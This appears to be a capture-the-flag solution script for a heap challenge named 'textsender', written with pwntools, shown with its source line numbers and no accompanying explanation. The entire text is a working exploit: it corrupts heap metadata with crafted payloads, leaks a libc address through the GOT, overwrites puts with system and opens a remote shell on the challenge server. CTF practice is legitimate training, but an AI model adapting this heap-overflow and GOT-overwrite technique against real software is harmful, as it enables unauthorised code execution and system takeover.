1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
|
from pwn import *
io = remote('chals.sekai.team', 4000)
context.binary = 'textsender'
elf = ELF('textsender', checksec = False)
libc = ELF('libc-2.32.so', checksec = False)
ru = lambda x : io.recvuntil(x, drop = True)
sla = lambda a, b : io.sendlineafter(a, b)
ia = lambda : io.interactive()
uu64 = lambda x : u64(x.ljust(8, '\x00'))
libc_os = lambda x : libc_base + x
libc_sym = lambda x : libc_os(libc.sym[x])
def menu(choice):
sla('> ', str(choice))
def set_sender(name):
menu(1)
sla('Sender\'s name: ', name)
def add_message(name, msg):
menu(2)
sla('Receiver: ', name)
sla('Message: ', msg)
def edit_message(name, msg):
menu(3)
sla('Name: ', name)
data = ru('\n')
if 'Cannot' in data:
return
sla('New message: ', msg)
def print_message():
menu(4)
def send_message():
menu(5)
for i in range(8):
add_message(str(i), 'a')
set_sender('a')
send_message()
for i in range(8):
add_message(str(i), 'a')
send_message()
edit_message('a' * 0x420, 'a')
edit_message('a' * 0x100, 'a')
for i in range(7):
add_message(str(i), 'a')
pld = flat({
0xa8: 0x201,
0xb0: 'Sender: ',
}, length = 0x100)
edit_message(pld, 'a')
add_message('7', 'a')
send_message()
for i in range(8):
add_message(str(i), 'a')
pld = flat({
0x138: 0x21,
0x140: 0x0000000000404028,
0x148: 0x0000000000404018,
})
edit_message('6', pld)
print_message()
ru('(Draft 7) ')
puts_addr = uu64(ru(':'))
libc_base = puts_addr - libc.sym['puts']
sys_addr = libc_sym('system')
edit_message(flat(puts_addr), flat(sys_addr))
edit_message('/bin/sh\x00', 'a')
ia()
|
